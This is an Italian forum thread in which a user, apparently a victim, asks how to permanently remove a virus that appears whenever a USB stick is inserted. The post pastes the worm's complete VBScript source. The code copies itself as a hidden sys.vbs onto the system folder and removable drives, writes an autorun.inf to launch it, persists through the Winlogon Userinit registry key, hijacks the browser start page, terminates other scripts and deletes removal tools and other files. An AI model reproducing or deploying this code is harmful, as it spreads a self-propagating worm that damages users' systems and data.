|
|||||||
|
|
|
 |
|
|
Strumenti |
12-02-2017, 17:22
|
#1 |
|
Senior Member
Iscritto dal: Oct 2004
Messaggi: 434
|
virus che si copia all'inserimento della chiavetta usb
Ciao a tutti
ogni volta che inserisco la chiavetta usb nel pc si creano 2 file: - file autorun - file .vbs ho rinominato il file vbs e questo è il suo contenuto: Option Explicit On Error Resume Next Dim Fso,Shells,SystemDir,WinDir,Count,File,Drv,Drives,InDrive,ReadAll,AllFile,WriteAll,Del,Chg,folder,files,Delete,auto,root Dim strComputer,colProcessList,objWMIService,objProcess Set Fso = CreateObject("Scripting.FileSystemObject") Set Shells = CreateObject("Wscript.Shell") Set WinDir = Fso.GetSpecialFolder(0) Set SystemDir =Fso.GetSpecialFolder(1) Set File = Fso.GetFile(WScript.ScriptFullName) Set Drv = File.Drive Set InDrive = Fso.drives Set ReadAll = File.OpenAsTextStream(1,-2) do while not ReadAll.atendofstream AllFile = AllFile & ReadAll.readline AllFile = AllFile & vbcrlf Loop Count=Drv.DriveType Do strComputer = "." Set objWMIService = GetObject("winmgmts:" _ & "{impersonationLevel=impersonate}!\\" _ & strComputer & "\root\cimv2") Set colProcessList = objWMIService.ExecQuery _ ("Select * from Win32_Process where name='wscript.exe'") For Each objProcess in colProcessList if (eval(InStrRev(objProcess.Commandline,"sys.vbs"))<=0) Then objProcess.Terminate End if Next If Not Fso.FileExists(SystemDir & "\sys.vbs") then set WriteAll = Fso.CreateTextFile(SystemDir & "\sys.vbs",2,true) WriteAll.Write AllFile WriteAll.close set WriteAll = Fso.GetFile(SystemDir & "\sys.vbs") WriteAll.Attributes = -1 End If Shells.RegWrite "HKCU\Software\Microsoft\Internet Explorer\Main\Window Title","Microsoft Internet Explorer" Shells.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions","0","REG_DWORD" Shells.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr","0","REG_DWORD" Shells.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools","0","REG_DWORD" Shells.RegWrite "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.hackercracker.com.np" Shells.RegWrite "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell","explorer.exe" Shells.RegWrite "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit",SystemDir & "\userinit.exe," & _ SystemDir & "\wscript.exe " & SystemDir & "\sys.vbs" For Each Drives In InDrive root = Drives.Path & "\" If Fso.GetParentFolderName(WScript.ScriptFullName)=root Then Shells.Run "explorer.exe " & root End If Set folder=Fso.GetFolder(root) Set Delete = Fso.DeleteFile(SystemDir & "\killvbs.vbs",true) Set Delete=Fso.DeleteFile(SystemDir & "\VirusRemoval.vbs",true) For Each files In folder.Files auto=Left(files.Name,7) If UCase(auto)=UCase("autorun") Then Set Delete = Fso.DeleteFile(root & files.Name,true) End If Next If Drives.DriveType=2 Then delext "inf",Drives.Path & "\" delext "INF",Drives.Path & "\" End if If Drives.DriveType = 1 Or Drives.DriveType = 2 Then If Drives.Path<> "A:" Then delext "vbs",WinDir & "\" delext "vbs",Drives.Path & "\" If Fso.FileExists(Drives.Path & "\ravmon.exe") Then Fso.DeleteFile(Drives.Path & "\ravmon.exe") End If If Fso.FileExists(Drives.Path & "\sxs.exe") Then Fso.DeleteFile(Drives.Path & "\sxs.exe") End If If Fso.FileExists(Drives.Path & "\winfile.exe") Then Fso.DeleteFile(Drives.Path & "\winfile.exe") End If If Fso.FileExists(Drives.Path & "\run.wsh") Then Fso.DeleteFile(Drives.Path & "\run.wsh") End If If Drives.DriveType = 1 Then If Drives.Path<>"A:" Then If Not Fso.FileExists(Drives.Path & "\sys.vbs") Then Set WriteAll=Fso.CreateTextFile(Drives.Path & "\sys.vbs",2,True) WriteAll.Write AllFile WriteAll.Close Set WriteAll = Fso.GetFile(Drives.Path & "\sys.vbs") WriteAll.Attributes = -1 End If If Fso.FileExists(Drives.Path & "\autorun.inf") Or Fso.FileExists(Drives.Path & "\AUTORUN.INF") Then Set Chg = Fso.GetFile(Drives.Path & "\autorun.inf") Chg.Attributes = -8 Set WriteAll = Fso.CreateTextFile(Drives.Path & "\autorun.inf",2,True) WriteAll.writeline "[autorun]" WriteAll.WriteLine "open=wscript.exe sys.vbs" WriteAll.WriteLine "shell\open=Open" WriteAll.WriteLine "shell\open\Command=wscript.exe sys.vbs" WriteAll.Close Set WriteAll = Fso.GetFile(Drives.Path & "\autorun.inf") WriteAll.Attributes = -1 else Set WriteAll = Fso.CreateTextFile(Drives.Path & "\autorun.inf",2,True) WriteAll.writeline "[autorun]" WriteAll.WriteLine "open=wscript.exe sys.vbs" WriteAll.WriteLine "shell\open=Open" WriteAll.WriteLine "shell\open\Command=wscript.exe sys.vbs" WriteAll.Close Set WriteAll = Fso.GetFile(Drives.Path & "\autorun.inf") WriteAll.Attributes = -1 End if End If End If End if End If Next if Count <> 1 then Wscript.sleep 10000 end if loop while Count<>1 sub delext(File2Find, SrchPath) Dim oFileSys, oFolder, oFile,Cut,Delete Set oFileSys = CreateObject("Scripting.FileSystemObject") Set oFolder = oFileSys.GetFolder(SrchPath) For Each oFile In oFolder.Files Cut=Right(oFile.Name,3) If UCase(Cut)=UCase(file2find) Then If oFile.Name <> "sys.vbs" Then Set Delete = oFileSys.DeleteFile(srchpath & oFile.Name,true) End If Next End sub sub runMe() End Sub come posso cancellare definitivamente questo virus dal pc? grazie |
|
|
|
|
_S.jpg){kind=small}
| Strumenti | |
|
|
Tutti gli orari sono GMT +1. Ora sono le: 14:44.
_XXL.jpg)
